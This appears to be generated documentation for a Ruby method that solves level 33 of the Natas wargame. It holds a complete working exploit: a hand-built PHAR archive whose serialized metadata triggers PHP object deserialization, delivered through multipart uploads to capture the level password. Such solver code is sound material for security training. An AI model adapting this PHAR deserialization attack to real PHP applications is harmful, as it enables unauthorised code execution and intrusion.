class NatasLevel33

Level 33

Constants

LEVEL
MAX_FILESIZE
PAGE
PAYLOAD
PAYLOAD_FILENAME
PHARNAME
PHAR_FILENAME

Public Instance Methods

exec()
# File lib/natas.rb, line 955
# Solves the level in three multipart uploads to PAGE and then reads the
# password out of the last response.
#
# 1. Uploads PAYLOAD under the name PAYLOAD_FILENAME.
# 2. Uploads a hand-built PHAR archive (PHAR_FILENAME) whose serialized
#    metadata is an `Executor` object pointing at PAYLOAD_FILENAME and
#    carrying the MD5 of PAYLOAD.
# 3. Posts a body of MAX_FILESIZE + 1 bytes under the name PHARNAME and
#    scans the response body for "Password: ...".
#
# Relies on helpers defined elsewhere in lib/natas.rb: `log`, `post`,
# `found` and `not_found`. Returns whatever `found`/`not_found` return.
#
# NOTE(review): the archive bytes are laid out by hand (manifest lengths,
# offsets, file entry, signature block). Every `s:N:"..."` length in the
# serialized object is computed with `bytesize`, so PAYLOAD_FILENAME and the
# MD5 hex string may vary in length without breaking the manifest; the
# surrounding fixed-size headers, however, are hard-coded for exactly this
# object layout and property set.
def exec
  # MD5 hex digest of the uploaded payload; embedded as the `signature`
  # property of the serialized Executor object below.
  payload_signature = Digest::MD5.hexdigest(PAYLOAD)
  log("Payload MD5 signature: #{payload_signature}")

  # PHAR stub (`<?php __HALT_COMPILER(); ?>`) followed by the binary
  # manifest. The metadata is a PHP-serialized `Executor` object; the
  # `\x00Executor\x00<name>` property keys are PHP's serialized spelling
  # of private properties (filename, signature, init). A single
  # `empty.php` entry follows the metadata. `.dup` guards against a frozen
  # literal, since the string is appended to in place below.
  phar_payload = %(<?php __HALT_COMPILER(); ?>\r\n\xD4\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x00\x00\x9D\x00\x00\x00O:8:\"Executor\":3:{s:18:\"\x00Executor\x00filename\";s:#{PAYLOAD_FILENAME.bytesize}:\"#{PAYLOAD_FILENAME}\";s:19:\"\x00Executor\x00signature\";s:#{payload_signature.bytesize}:\"#{payload_signature}\";s:14:\"\x00Executor\x00init\";b:0;}\t\x00\x00\x00empty.php\x00\x00\x00\x00\x8C\x9CSa\x00\x00\x00\x00\x00\x00\x00\x00\xB4\x01\x00\x00\x00\x00\x00\x00).dup
  # Treat the buffer as raw bytes so the SHA1 covers exactly the bytes on
  # the wire and the binary `<<` appends below do not raise on encoding.
  phar_payload.force_encoding('ascii-8bit')
  # PHAR signature block: raw 20-byte SHA1 of everything before it, then the
  # 4-byte signature-type flag and the `GBMB` trailer magic.
  phar_signature = Digest::SHA1.digest(phar_payload)
  log("PHAR SHA1 signature: #{phar_signature.unpack1('H*')}")
  phar_payload << phar_signature
  phar_payload << "\x02\x00\x00\x00GBMB"

  # Upload 1: the payload itself. The response is not inspected, so an
  # upload rejected by the server would only surface as a miss in the final
  # regex match.
  log("Uploading file with payload: #{PAYLOAD_FILENAME}")
  data = [
    ['filename', PAYLOAD_FILENAME],
    ['uploadedfile', PAYLOAD, { filename: 'uploadedfile' }]
  ]
  post(PAGE, {}, data, multipart: true)

  # Upload 2: the PHAR archive built above. Response likewise unchecked.
  log("Uploading file with PHAR payload: #{PHAR_FILENAME}")
  data = [
    ['filename', PHAR_FILENAME],
    ['uploadedfile', phar_payload, { filename: 'uploadedfile' }]
  ]
  post(PAGE, {}, data, multipart: true)

  # Upload 3: a body one byte over MAX_FILESIZE, submitted under PHARNAME.
  # Presumably this drives the server down its size-rejection path while it
  # handles PHARNAME; the server-side behaviour is not visible here. Only
  # this response body is kept.
  log("Executing PHAR payload: #{PHARNAME}")
  data = [
    ['filename', PHARNAME],
    ['uploadedfile', "\x00" * (MAX_FILESIZE + 1), { filename: 'uploadedfile' }]
  ]
  data = post(PAGE, {}, data, multipart: true).body

  # The level's password is expected as a single \w+ token after
  # "Password: "; anything else is reported via not_found.
  match = /Password: (\w+)/.match(data)
  not_found unless match
  found(match[1])
end